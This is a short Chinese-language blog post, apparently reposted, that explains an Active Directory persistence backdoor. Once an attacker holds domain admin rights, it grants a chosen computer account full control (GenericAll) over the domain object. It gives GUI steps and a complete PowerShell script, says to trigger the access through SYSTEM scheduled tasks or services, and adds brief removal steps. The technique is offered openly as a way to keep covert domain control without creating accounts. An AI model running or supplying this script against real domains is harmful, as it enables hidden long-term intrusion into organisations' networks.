前置要求
- 已获得域管理权限
- 有一台域下的计算机SYSTEM权限
相较于其他维权方式的优点:
常见的方法都是围绕着用户、密码、票据来实现权限维持。
此方法不需要添加域账号,也就不用为密码过期、账号禁用、票据操作而头疼。
操作步骤
界面上操作
右键域->委派控制
添加->高级->对象类型->勾选计算机 找到有权限的计算机
创建自定义任务
默认值,下一步
选择完全控制
使用powershell修改
1 2 3 4 5 6 7 8 9 10
| Import-Module ActiveDirectory $ad = [ADSI]("LDAP://DC=zpyjjd,DC=com") $computer = Get-ADComputer -Identity "WIN-N39A9OGCR8N" $Identity = New-Object 'Security.Principal.SecurityIdentifier' $computer.SID.Value $rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll $type = [System.Security.AccessControl.AccessControlType]::Allow $inherit = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$rights,$type,$inherit $ad.ObjectSecurity.AddAccessRule($ace) $ad.CommitChanges()
|
此时该计算机就具备整个域控的权限。
如何触发
可以通过计划任务,创建一个SYSTEM权限运行计划
也可以通过创建SYSTEM运行的服务来触发
如何删除
选择高级功能
右键域,选择属性。再选择安全,最后选择之前添加的计算机,点击删除
文章来源: https://guage.cool/windows-ad-persistent/
如有侵权请联系:admin#unsafe.sh